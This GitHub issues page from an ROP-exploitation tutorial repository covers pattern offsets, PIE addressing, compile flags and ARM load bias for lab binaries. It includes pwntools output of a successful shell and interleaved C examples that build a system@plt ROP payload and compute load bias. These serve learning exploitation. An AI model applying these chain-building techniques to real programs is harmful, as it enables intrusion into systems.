rop_step_by_step's People

Contributors

zhengmin1989


rop_step_by_step's Issues

Address looks wrong when fuzzing with pattern.py

Zhengmin, when I filled level1, attached in gdb, with 150 bytes of data generated by pattern, the output was as follows:
(gdb) run
Starting program: /root/test1
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9

Program received signal SIGSEGV, Segmentation fault.
0x00005555555546aa in vulnerable_function ()
(gdb)
Why does the address 0x00005555555546aa have this form? Did something go wrong, or did disabling ASLR fail at compile time?
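An address like 0x00005555555546aa is what gdb shows for a position-independent executable: gdb disables ASLR by default, and the kernel then maps a PIE at 0x555555554000 on x86-64, so the faulting instruction is 0x6aa into the image. Whether a binary is a PIE is recorded in its ELF header (e_type is ET_DYN for a PIE and ET_EXEC for a fixed-address build), and that is the check to make before trusting addresses taken from the file. The following is an added example, not pattern.py or any code from the repository: it regenerates the same Aa0Aa1... pattern, finds the offset of a crash value in it, and reads e_type from a file; all function names are mine.

```c
/* Added example (not the repository's pattern.py): generate the Aa0Aa1...
 * cyclic pattern, locate a crash value inside it, and read the ELF e_type
 * field to tell a PIE from a fixed-address build. */
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fill out with len bytes of the pattern and NUL-terminate it (out needs
 * len + 1 bytes).  Triples are (upper, lower, digit), so 150 bytes end in
 * "Ae9"; the full cycle is 26 * 26 * 10 * 3 = 20280 bytes, within which
 * every 4-byte window is unique. */
size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                const char triple[3] = { u, l, d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = triple[i];
            }
    out[n] = '\0';
    return n;
}

/* Offset of a register/stack value within the pattern.  value is taken as
 * width little-endian bytes: 4 for EIP on 32-bit, 8 for the slot at RSP on
 * x86-64 (a ret to a non-canonical address faults on the ret itself, so RIP
 * still points into the vulnerable function and the pattern bytes are the
 * 8 bytes at RSP).  Returns -1 if the bytes do not occur. */
long pattern_offset(const char *pat, size_t patlen, uint64_t value, unsigned width)
{
    unsigned char needle[8];
    if (width == 0 || width > 8 || patlen < width) return -1;
    for (unsigned i = 0; i < width; i++)
        needle[i] = (unsigned char)(value >> (8 * i));
    for (size_t i = 0; i + width <= patlen; i++)
        if (memcmp(pat + i, needle, width) == 0)
            return (long)i;
    return -1;
}

/* e_type from the first bytes of an ELF image: ET_EXEC (2) is a fixed-address
 * binary (checksec's "No PIE (0x400000)"), ET_DYN (3) is a PIE that the
 * kernel places at a base chosen at load time (0x555555554000 on x86-64 with
 * ASLR off, as under gdb).  e_type sits right after the 16 identification
 * bytes in both ELF32 and ELF64.  Returns -1 for anything that is not ELF. */
int elf_type(const unsigned char *img, size_t len)
{
    if (len < EI_NIDENT + 2 || memcmp(img, ELFMAG, SELFMAG) != 0)
        return -1;
    if (img[EI_DATA] == ELFDATA2MSB)
        return (img[EI_NIDENT] << 8) | img[EI_NIDENT + 1];
    return img[EI_NIDENT] | (img[EI_NIDENT + 1] << 8);
}

int elf_file_type(const char *path)
{
    unsigned char hdr[EI_NIDENT + 2];
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    size_t n = fread(hdr, 1, sizeof hdr, f);
    fclose(f);
    return elf_type(hdr, n);
}

/* Offset of value in a 150-byte pattern, the length used in the issue. */
long offset_in_150(uint64_t value, unsigned width)
{
    char pat[151];
    size_t n = pattern_create(pat, 150);
    return pattern_offset(pat, n, value, width);
}

/* Usage: ./cyclic <binary> [crash-value]   (crash-value e.g. from x/gx $rsp) */
int main(int argc, char **argv)
{
    char pat[151];
    pattern_create(pat, 150);
    puts(pat);
    if (argc > 1) {
        int t = elf_file_type(argv[1]);
        printf("%s: e_type=%d (%s)\n", argv[1], t,
               t == ET_DYN ? "ET_DYN, PIE" : t == ET_EXEC ? "ET_EXEC, fixed base" : "not ELF");
    }
    if (argc > 2) {
        uint64_t v = strtoull(argv[2], NULL, 0);
        printf("offset of %#llx: %ld\n", (unsigned long long)v,
               pattern_offset(pat, 150, v, v > 0xffffffffULL ? 8 : 4));
    }
    return 0;
}
```

For a PIE the addresses gdb prints are only valid for that one run with ASLR off; the value of interest from the crash above is not RIP but the 8 bytes at RSP, which is what the 8-byte search handles.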

What are options to compile these binaries?

Hello, thank you for sharing these examples.

I'm just curious: how did you compile the binaries for linux_x64?

I am able to successfully exploit the binary that comes with the repository as shown below:

~/Downloads/ROP_STEP_BY_STEP/linux_x64 (master*) » python3 exp5.py                        
[*] '/home/Downloads/ROP_STEP_BY_STEP/linux_x64/level3'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './level3': pid 74600
[*] Switching to interactive mode
Hello, World
$ pwd
/home/Downloads/ROP_STEP_BY_STEP/linux_x64
$ exit
[*] Got EOF while reading in interactive
$
[*] Process './level3' stopped with exit code -11 (SIGSEGV) (pid 74600)
[*] Got EOF while sending in interactive

However, if I try to compile the binary by myself such as using the option shown below:
gcc level3.c -o level3_custom -fno-stack-protector -no-pie

Then it won't work:

~/Downloads/ROP_STEP_BY_STEP/linux_x64 (master*) » python3 exp5.py 
[*] '/home/Downloads/ROP_STEP_BY_STEP/linux_x64/level3_custom'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './level3_custom': pid 75948
[*] Switching to interactive mode
Hello, World
[*] Got EOF while reading in interactive
$ whoami
[*] Process './level3_custom' stopped with exit code -11 (SIGSEGV) (pid 75948)
[*] Got EOF while sending in interactive

I made sure to adjust exp5.py, using gdb to find the system@plt address, 0x401040:

~/Downloads/ROP_STEP_BY_STEP/linux_x64 (master*) » gdb ./level3_custom 
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
...
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./level3_custom...(no debugging symbols found)...done.
>>> disas callsystem
Dump of assembler code for function callsystem:
   0x0000000000401142 <+0>:     push   %rbp
   0x0000000000401143 <+1>:     mov    %rsp,%rbp
   0x0000000000401146 <+4>:     lea    0xeb7(%rip),%rdi        # 0x402004
   0x000000000040114d <+11>:    callq  0x401040 <system@plt>
   ...

Thank you in advance.
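The numbers an exploit script hard-codes (the distance from the buffer to the saved return address, gadget addresses, the address of the "/bin/sh" string, system@plt) are properties of one particular build, so a binary compiled with another gcc or glibc needs them re-measured, and on x86-64 it also needs the stack aligned the way the ABI promises a called function. The following is an added example, not exp5.py or any code from the repository: it packs a chain from such measured values and applies the alignment check. system@plt (0x401040) and the string address (0x402004) are taken from the disassembly in this issue; the gadget addresses, the 136-byte offset and the stack address are placeholders I assumed.

```c
/* Added example (not the repository's exp5.py): build a level3-style
 * payload and check the x86-64 stack alignment at the slot that returns
 * into system@plt. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Little-endian 8-byte pack and unpack, what pwntools' p64()/u64() do. */
void p64(uint8_t *dst, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        dst[i] = (uint8_t)(v >> (8 * i));
}

uint64_t u64(const uint8_t *src)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | src[i];
    return v;
}

/* Payload = rip_offset filler bytes (distance from the start of the
 * overflowed buffer to the saved return address, measured on the exact
 * binary being run; a recompile changes it) followed by 8-byte slots.
 * Returns the payload length, 0 if it does not fit. */
size_t build_payload(uint8_t *out, size_t outlen, size_t rip_offset,
                     const uint64_t *slots, size_t nslots)
{
    size_t total = rip_offset + 8 * nslots;
    if (total > outlen) return 0;
    memset(out, 'A', rip_offset);
    for (size_t i = 0; i < nslots; i++)
        p64(out + rip_offset + 8 * i, slots[i]);
    return total;
}

/* SysV x86-64: on entry to a function RSP % 16 == 8, because `call` pushed
 * 8 bytes onto a 16-byte aligned stack.  A `ret` from chain slot S leaves
 * RSP == S + 8, so the slot holding the callee's address must itself be
 * 16-byte aligned.  glibc's system() relies on this (aligned SSE stores on
 * its frame); a misaligned entry dies with SIGSEGV inside system() instead
 * of giving a shell. */
int slot_entry_aligned(uint64_t slot_addr)
{
    return slot_addr % 16 == 0;
}

/* slot0_addr is the address of the saved-RIP slot (read once in gdb with
 * `p $rsp` at the ret; its value mod 16 is fixed by the frame layout, so it
 * survives ASLR).  Returns how many lone `ret` gadgets (0 or 1) must precede
 * the slot at target_index to realign it. */
size_t ret_gadgets_needed(uint64_t slot0_addr, size_t target_index)
{
    return slot_entry_aligned(slot0_addr + 8 * target_index) ? 0 : 1;
}

/* pop rdi; ret / &"/bin/sh" / [ret] / system@plt, alignment fix applied.
 * slots needs room for 4 entries; returns the number written. */
size_t level3_chain(uint64_t *slots, uint64_t slot0_addr, uint64_t pop_rdi_ret,
                    uint64_t binsh, uint64_t ret_gadget, uint64_t system_plt)
{
    size_t n = 0;
    slots[n++] = pop_rdi_ret;
    slots[n++] = binsh;
    if (ret_gadgets_needed(slot0_addr, n))
        slots[n++] = ret_gadget;
    slots[n++] = system_plt;
    return n;
}

/* Demo values: the first three are assumed placeholders, the last two come
 * from the disassembly in the issue. */
#define RIP_OFFSET   136ULL       /* assumed buffer-to-saved-RIP distance */
#define POP_RDI_RET  0x401203ULL  /* assumed pop rdi; ret gadget */
#define RET_GADGET   0x40101aULL  /* assumed lone ret */
#define BINSH_ADDR   0x402004ULL  /* string passed to system in callsystem */
#define SYSTEM_PLT   0x401040ULL  /* system@plt */

/* Build the demo payload for a given slot0 address; returns its length. */
size_t demo_payload(uint8_t *out, size_t outlen, uint64_t slot0_addr)
{
    uint64_t slots[4];
    size_t n = level3_chain(slots, slot0_addr, POP_RDI_RET, BINSH_ADDR, RET_GADGET, SYSTEM_PLT);
    return build_payload(out, outlen, RIP_OFFSET, slots, n);
}

size_t demo_payload_len(uint64_t slot0_addr)
{
    uint8_t payload[256];
    return demo_payload(payload, sizeof payload, slot0_addr);
}

/* 8-byte value stored at chain slot idx of the demo payload, 0 if absent. */
uint64_t demo_slot(uint64_t slot0_addr, size_t idx)
{
    uint8_t payload[256];
    size_t len = demo_payload(payload, sizeof payload, slot0_addr);
    if (len == 0 || RIP_OFFSET + 8 * (idx + 1) > len) return 0;
    return u64(payload + RIP_OFFSET + 8 * idx);
}

int main(void)
{
    uint64_t slot0 = 0x7fffffffe3c8ULL;   /* assumed $rsp at the ret */
    printf("slot0 %% 16 = %llu -> %zu ret gadget(s) before system@plt, payload %zu bytes\n",
           (unsigned long long)(slot0 % 16), ret_gadgets_needed(slot0, 2), demo_payload_len(slot0));
    return 0;
}
```

When the binary already has a callsystem function that calls system itself, the chain shrinks to one slot holding callsystem's address, and the same alignment rule applies to that slot: callsystem's push rbp and its call leave system's entry at RSP % 16 == 8 only if callsystem itself was entered as the ABI expects.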

free note 32-bit question

payload += p32(0) + p32(notelen+0x9)+ "B" * (notelen-0x10)

What is the reason for the -0x10 at the end of the payload?

ROP (x64): exp4.py fails with vulfun_addr but succeeds with the address of main

In the first section of the linux_x64 part of "ROP step by step", "Memory Leak & DynELF - performing a ROP attack without obtaining the target libc.so", I found during testing that exp4.py does not succeed with vulfun_addr but does succeed with the address of main. The environment is Ubuntu 16.04.1 64-bit. With vulfun_addr, debugging in GDB shows that the call to the system function has no effect and returns 0x7f00 (32512); execution then continues into vulfun, finally executes .bss, and then a SIGSEGV signal is received.

I am very confused here. Judging from the stack contents, everything is as expected, so why does vulfun_addr not work? Why does main work? How can it be made to work with vulfun; is there a trick?
I hope you can clear up a beginner's confusion, thanks!
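system() does not return the command's exit code but the wait status of the sh -c child, so a value such as 0x7f00 has to be decoded with the macros in <sys/wait.h>: it is a normal exit with status 127, the value sh reports when the command string it was handed cannot be found or executed. The "exit code -11 (SIGSEGV)" pwntools prints elsewhere on this page is the other encoding of the same status word, termination by signal 11. The following is an added example, not part of this issue or of the repository, that decodes such values; the bogus command string it runs is constructed.

```c
/* Added example (not from the repository): decode the wait status that
 * system() returns and that a crashed process reports. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>

/* Returns the exit status (0..255) for a normal exit, -signal when the
 * child was killed by a signal, or -1000 if the status is -1 (fork or exec
 * failed before a child ran) or not recognised. */
int decode_wait_status(int status)
{
    if (status == -1) return -1000;
    if (WIFEXITED(status)) return WEXITSTATUS(status);
    if (WIFSIGNALED(status)) return -WTERMSIG(status);
    return -1000;
}

/* What sh reports when the string it is handed is not a runnable command:
 * exit status 127, i.e. a wait status of 0x7f00.  The command string here is
 * constructed for the demo. */
int run_bogus_command(void)
{
    return decode_wait_status(system("this_is_not_a_command_zz 2>/dev/null"));
}

int main(void)
{
    printf("0x7f00 -> %d (sh exited with 127: command not found)\n", decode_wait_status(0x7f00));
    printf("0x000b -> %d (killed by signal 11, SIGSEGV)\n", decode_wait_status(0x000b));
    printf("live system() on a bogus command -> %d\n", run_bogus_command());
    return 0;
}
```

A 127 from system() therefore says the shell was reached and ran, and that whatever rdi pointed at was not a usable command string at the moment of the call; that is the thing to inspect in gdb (x/s $rdi at the entry to system) before looking anywhere else.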

Question about the callsystem function address on Android 5.1.1

Hi! I ran into a small problem when exploiting with arm32/exp/level6.py on Android 5.1.1. In arm32/exp/level6.py the address of the callsystem function is taken as its offset within the file, which fails at runtime on Android 5.1.1; callsystemaddr must also have the in-memory base address of level6 added to it to give the actual in-memory address of callsystem, and only after that change did the exploit succeed.
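A PIE's link-time addresses (what objdump, readelf and the file offsets give) become runtime addresses only after adding the load bias, which is the base printed for the executable in /proc/<pid>/maps when its first PT_LOAD segment has virtual address 0; for a fixed-address binary the bias is 0, which is why the same constants work unchanged on the non-PIE x64 levels. The following is an added example, not from the repository, that computes the bias of the running process the way one does by hand on a device and cross-checks it against AT_PHDR from the auxiliary vector. It is Linux/glibc specific and all names are mine.

```c
/* Added example (not from the repository): derive the runtime load bias of
 * the running executable from /proc/<pid>/maps plus the ELF program headers,
 * and cross-check it against the program-header address the kernel passes in
 * the auxiliary vector. */
#include <elf.h>
#include <link.h>       /* ElfW(): Elf32_/Elf64_ types for the native class */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/auxv.h>
#include <unistd.h>

struct elf_load_info {
    uintptr_t min_vaddr;   /* lowest PT_LOAD p_vaddr: 0 for a PIE, 0x400000 for x86-64 ET_EXEC */
    uintptr_t phdr_vaddr;  /* link-time address of the program header table */
    int is_pie;            /* e_type == ET_DYN */
};

int read_load_info(const char *path, struct elf_load_info *li)
{
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    ElfW(Ehdr) eh;
    uintptr_t lo = UINTPTR_MAX, lo_off = 0;
    if (fread(&eh, sizeof eh, 1, f) == 1 && memcmp(eh.e_ident, ELFMAG, SELFMAG) == 0) {
        for (int i = 0; i < eh.e_phnum; i++) {
            ElfW(Phdr) ph;
            if (fseek(f, (long)(eh.e_phoff + (size_t)i * eh.e_phentsize), SEEK_SET) != 0 ||
                fread(&ph, sizeof ph, 1, f) != 1) { lo = UINTPTR_MAX; break; }
            if (ph.p_type == PT_LOAD && ph.p_vaddr < lo) { lo = ph.p_vaddr; lo_off = ph.p_offset; }
        }
    }
    fclose(f);
    if (lo == UINTPTR_MAX) return -1;
    li->min_vaddr = lo;
    li->phdr_vaddr = lo - lo_off + eh.e_phoff;  /* the headers live in the first segment */
    li->is_pie = eh.e_type == ET_DYN;
    return 0;
}

/* Start of the first mapping backed by path: the base one reads off
 * `cat /proc/<pid>/maps` on the target. */
int first_mapping(const char *path, uintptr_t *start)
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) return -1;
    char line[512], perms[8], dev[16], mpath[256];
    unsigned long s, e, off, inode;
    int rc = -1;
    while (fgets(line, sizeof line, f)) {
        mpath[0] = '\0';
        if (sscanf(line, "%lx-%lx %7s %lx %15s %lu %255s", &s, &e, perms, &off, dev, &inode, mpath) == 7 &&
            strcmp(mpath, path) == 0) { *start = s; rc = 0; break; }
    }
    fclose(f);
    return rc;
}

/* bias = where the first segment landed minus where the link expected it
 * (rounded to the page the mapping starts on): 0 for a non-PIE binary, the
 * base that had to be added to callsystem's file address for the PIE. */
uintptr_t bias_from_maps(uintptr_t mapping_start, uintptr_t min_vaddr, long page)
{
    return mapping_start - (min_vaddr & ~(uintptr_t)(page - 1));
}

/* Independent answer: AT_PHDR is the runtime address of the program headers. */
uintptr_t bias_from_auxv(uintptr_t phdr_vaddr)
{
    return (uintptr_t)getauxval(AT_PHDR) - phdr_vaddr;
}

uintptr_t relocate(uintptr_t bias, uintptr_t link_time_addr)
{
    return bias + link_time_addr;
}

/* Both computations for the running executable; returns 1 if they agree,
 * 0 on failure or mismatch.  *bias receives the maps-derived value. */
int self_bias(uintptr_t *bias)
{
    char exe[512];
    struct elf_load_info li;
    uintptr_t start;
    ssize_t n = readlink("/proc/self/exe", exe, sizeof exe - 1);
    if (n < 0) return 0;
    exe[n] = '\0';
    if (read_load_info(exe, &li) != 0 || first_mapping(exe, &start) != 0) return 0;
    *bias = bias_from_maps(start, li.min_vaddr, sysconf(_SC_PAGESIZE));
    return *bias == bias_from_auxv(li.phdr_vaddr);
}

int main(void)
{
    uintptr_t bias;
    if (!self_bias(&bias)) { puts("could not determine load bias"); return 1; }
    printf("load bias %#lx; self_bias at %p is link-time address %#lx\n",
           (unsigned long)bias, (void *)self_bias, (unsigned long)((uintptr_t)self_bias - bias));
    return 0;
}
```

Because the arithmetic is the same for both cases, an exploit that always computes base + link-time address, with base read from the target's maps (or leaked) and 0 when the binary is ET_EXEC, runs unchanged against a PIE and a fixed-address build.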
